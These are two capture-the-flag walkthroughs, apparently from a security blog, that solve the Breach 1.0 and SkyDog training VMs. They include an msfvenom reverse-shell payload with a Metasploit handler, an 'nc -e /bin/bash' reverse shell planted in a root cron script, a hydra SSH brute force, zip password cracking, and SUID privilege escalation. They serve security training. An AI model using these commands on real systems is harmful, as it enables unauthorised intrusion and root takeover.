Hack the Breach 1.0 VM (CTF Challenges)

This time we are going to solve a fun VM i.e. Breach 1.0. Let's find out what we already know about it:

Breach 1.0 is a first VM in a multi-part series, it is meant to be for beginner to intermediate boot2root/CTF challenge. It is configured with a static IP address (192.168.110.140) so you will need to configure your host-only adaptor to this subnet.

nmap -Pn 192.168.110.140

As you can see it has almost all the ports open that could only mean one thing i.e. an IDS is activated.

Now let's start nikto :

nikto -h 192.168.110.140

Nikto proved to be useless in this case. So now let's divert our attention to Port 80 which is most known and open so we will try by investigating the said port and do to so open the target IP into your browser.

On the home page you will find a image with some dialogues/comments. Open the page source and you will find a base64 encoded code:

<! ------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

Decode this code using a Add-On HackBar for Mozilla. Enable this Add-on and click on its Encoding tab then select Decode option. After this it will ask you for the string that you want to decode. Paste the code there and click on Ok

It will show the Base64 code again which means that the code has been encoded twice.

Further decode it with the similar method and you will have one username and password.

Now go back to the home page and click on the image. It will redirect you to another page.

We tried and open every tab but found nothing except the Employee Portal tab. clicking on Employ Portal tab will open a log in page. Log into it by username and password that you have just decoded using Hack Bar.

Once you are logged in, you will we that there are three messages in the inbox. Open each message one by one as we may find a clue in it.

In the first mail a user is simply sending a message to another user named peter. And as we found no clue in it we may move forward to the second mail.

Second mail is about IDS which confirms our suspicion about activated IDS.

Moving onto the third mail you will find that there is a URL mentioned and they are talking about a SSL certification. So let's not wait any longer and open the URL first.

Opening the URL it will show a file to download. Download the file and save it.

Now let's look for SSL in the search bar and see what it has to offer.

There is in fact an SSL certification present. Open it

In the SSL certificate you will find a URL.

Similarly, open the URL and it will ask you to download a file.

Once you have downloaded the file. Open it with wireshark

Now that the file is opened, try to read it by right clicking on the file and then selecting follow >> TCP stream. This is a normal method to read it but as you can see via this method you can't read the file as its encrypted and from earlier we know that SSL certificate will allow us to read it.

But now the problem is that SSL option is not activated. So now we have to find a way to activate it. Let's have look on the files that wireshark is providing. You can see that the most communication is taken place on the port 8443. This port is used for tomcat and the file we downloaded earlier, namely .keystore, might had all the certificates because we recall while downloading this keystore file mentioned something about tom cat which means our intuition is correct.

Now doing a lot of research on internet on security stack we found the keystore's proprietary format (called "JKS") to standardized format PKCS12.

keytool -importkeystore -srckeystore keystore -destkeystore mykeystore.p12 -deststoretype PKCS12 -srcalias tomcat

In passwords we have put tomcat as it the general default password. Now the file is ready to import.

So, now to activate it simply go to Edit menu from the menu bar and select Preferences from the drop down menu.

A dialog box will open, select protocols option and then select SSL and then click on Edit button.

Another dialog box will open. Here, give IP address of the target and port number 8443 along with the path of keystore file and the password.

Now we have activated SSL so right click on the file and choose the option Follow and then select SSL stream.

Finally, now you can read the file. In the file you will again find a base64 code. Decode it in the similar way using hack bar.

Decoding it with the Hackbar will give you the username and password as the result.

Traversing the file on wireshark some more will show you an URL as shown:

Opening this URL on the browser will open a software foundation page made in java. On this page you can find a browse option which means we can upload a malicious file here.

So now let's generate a mile through msfvenom which is compatible with java and for this type :

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=4444 -f war > /root/Desktop/update.war

Go to the browse option now and upload your file.

 The file is uploaded.

Now before clicking on the file open metasaploit and type ;

use exploit/multi/handler

set payload java/meterpreter/rever_tcp

set lhost 192.168.110.128

set lport 4444

exploit

Click the file once you hit enter and you will have you meterpreter's session in no time.

Now go to the shell and import the python file to have the control of terminal and for that type :

shell

echo “import pty; pty.spawn(‘/bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

Once you reach the terminal type the following command to see the details:

ls -lsa

As we found nothing in it we went back by typing :

cd ..

Then go to home and into the Milton and read the file which may have our flag. Do this with the following steps:

 cd home

ls -lsa

cd milton

ls -lsa

cat some_script.sh

LOL! We are trolled as there was no flag here. Now that we found nothing here we were back to square one which means we then started search everything again thoroughly. And then we found an image called bill.png.  

We read it with exiftool by typing:

exiftool bill.png

We found a password here i.e. coffeestains

Then go to the passwd file :

cat /etc/passwd

Then su and give the password as coffeestains :

su blumbergh

And then look for the ID's by typing :

id

On further exploring you will find a file called /usr/share/cleanup/tidyup.sh.  It says in this file that it runs every three minutes in order to defend itself from hackers. So now, as we have root's access we should be able to modify it and so type:

echo "nc -e /bin/bash 192.168.110.128 8443" > shell.txt

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

cat /usr/bin/tee /usr/share/cleanup/tidyup.sh

As they above commands have been executed, we will now need a listener to read our flag and for that type ;

nc -lvv -p 8443

YAYYYYY!!! Flag has been captured!!!

Hack the SkyDog VM (CTF Challenge)

Hack the SkyDog VM (CTF Challenge)

Hello friends!! Today we are going to solve antother CTF challenge “SkyDog” which is design by Mr. James Bower. The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services. This can be achieved without hacking the VM file itself. Capturing these flags is quite fun and interesting. Before starting off I am listing the following hints of all 6 flags that we know of beforehand and we have to find out their answers.

Flag #1 Home Sweet Home or (A Picture is worth a Thousand Words)

Flag #2 When do Androids Learn to Walk?

Flag #3 Who Can You Trust?

Flag #4 Who Doesn’t Love a Good Cocktail Party?

Flag #5 another Day at the Office

Flag #6 Little Black Box

Penetrating Methodologies:

Network Scaning (Netdiscover, Nmap)

Inspecting web services for (Flag 1, 2, 3 & 4)

Get flag 1^st  from inside SkyDogCon_CTF.jpg (Exiftool)

Get flag 2^nd using robot.txt

Get flag 3^rd from whistler.zip

Generating Dictionary for web directory (Cewl)

Directory brute force (Dirb)

Get flag 4^th from play inside PlayTronics

Get the pacp file and grab an audio file (Wireshark)

SSH Brute force Attack (Hydra)

Spawn TTY shell of machine and Get flag 5^th (SSH login)

Writable File privilege escalation

Get the Root Access and Capture the flag 6^th

WalkThrough

Let’s start off with scanning the network to find our target.

netdiscover

Our target is 192.168.1.102. Scan the target with nmap.

nmap -A 192.168.1.102

As the result we can see that port 22 and 80 are open. Therefore, open the IP in the browser. And as you can see there is nothing but the image of CTF in the webpage.

Download the image and read it with exiftool.

exittool SkyDogCon_CTF.jpg

Reading the image we will find the 1^st flag.

The first flag is in MD5 hash value and we will crack the hash value with online MD5 cracker. The value will make up to the word Welcome Home which is approximately close to author description for 1^st flag.

Flag #1 Home Sweet Home or (A Picture is worth a Thousand Words)

Flag 1: flag {abc40a2d4e023b42bd1ff04891549ae2}: Welcome Home

If you will go back to nmap scan result, then you will observe there is robot.txt file in which 15 entries are allowed and 252 are disallowed.

 And yes! Opening it in the browser we found our 2^nd flag. So let’s crack the MD5 value of the flag.

On cracking the value of Flag #2 is Bots

Flag #2 When do Androids Learn to Walk?

Flag 2: flag {cd4f10fcba234f0e8b2f60a490c306e6}: Bots

After cracking the flag #2 we explored robots.txt some more and upon opening all the allow directories one by one there was one which opened i.e. /Setec

Here it come up with following image with title “Too many secrets” therefore I decided to review its source code.

So with help of curl we inspect following URL and found an /Astronomy directory from here.

curl -v http://192.168.1.102/Setc/

Now open this directory by typing URL: http://192.168.1.102/Setec/Astronomy and here, you will find whistler.zip. Download the file.

This file is password protected therefore we need to find the password so that we can unzip this file. Now apply dictionary attack to find its password with the help of rockyou.txt and for that type:

fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt Whistler.zip

And you will find the password i.e. yourmother and now of course unzip the file:

unzip whistler.zip

After unzipping you will find Flag #3 and some other file with a hint. First open flag:

cat flag.txt

You will have your flag again in MD5 value. Crack it with similar method.

Flag #3 Who Can You Trust?

Flag3: flag{1871a3c1da602bf471d3d76cc60cdb9b}: yourmother

Now open the other file:

cat QuesttoFindCosmo.txt

This file will give you a hint regarding OSINT.

OSINT: Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC), the term “open” refers to overt, publicly available sources (as opposed to covert or clandestine sources); it is not related to open-source software or public intelligence.

That means we have to find something related to OSINT. If you recall there was a similar thing in the movie Sneakers and so we will use the movie and apply the technique of cewl here. CEWL lets us create a dictionary file using a URL and here we will use the URL of the movie to help us create the dictionary file and therefore type:

cewl --depth 1 https://www.imdb.com/title/tt0105435/trivia?ref_=tt_ql_2 -w /root/Desktop/dict.txt

My next step is abusing web directories by using above dictionary “dict.txt” to get some useful directories name with help of dirb command. 

dirb http://192.168.1.102/ dict.txt

This command will show us the following directories:

·         PlayTronics

·         Sectec

·         Astronomy

We have already seen the content of Setec and Astronomy directories and so we will now explore PlayTronics.

And to our luck we found Flag.txt in the PlayTronics directory.

We got 4^th flag from here, lest crack it to get the value of Flag# 4.

Crack the flag with similar method and you will have the Flag #4 vlaue i.e. leroybrown

Flag #4 Who Doesn’t Love a Good Cocktail Party?

Flag 4 : flag{c07908a705c22922e6d416e0e1107d99}: leroybrown

In PlayTronics we also found a file with .pcap extension. Open that file with wireshark. And upon studying its data carefully you will find an audio file. Download audio file.

Upon playing the file you will find it says only one word i.e. werner brandes. Now this “werner brandes” word can be our user name. So make a text file with possible combinations of username using the word “werner brandes”. Also, make a text file for passwords containing all the flag values that we just found.

hydra -v -L dict.txt -P dict.txt.txt 192.168.1.102 ssh

As you can observe that we had successfully grabbed the SSH username as wernerbrandes and password as leroybrown.

Now that you have username and password log in with SSH

ssh wernerbrandes@192.168.1.102

And fortunately we also found Flag #5 in MD5 value.

Crack it with same method and the will turn up to be Dr. Gunter Janek

Flag #5 another Day at the Office

Flag 5: flag{82ce8d8f5745ff6849fa7af1473c9b35}: Dr. Gunter Janek

Now let’s find a writable file and for that type:

find / -writable -type f

So we will open the sanitizer.py file with the following steps:

cd /lib

cd log

nano sanitizer.py

So here the following script was added by admin to cleanup all junk file from inside /tmp and these type of files depends upon specific time interval for executions.

Now replace “rm -r /tmp/*” from the following line as given below code which will enable SUID bit for /bin/sh after some time.

os.system(‘chmod u+s /bin/sh’)

Now let go to bin /bin/sh and try to get root access with help of following command.

/bin/sh

id

whoami

ls

cd BlackBox

And here is our 6^th the last flag lets capture it.

cat flag.txt

Crack the value of flag with the same method.

Flag #6 Little Black Box

Flag 6: flag {b70b205c96270be6ced772112e7dd03f}: CongratulationsYouDidIt

HURRAYYY!!! All the six flags have been captures. And this CTF is completed.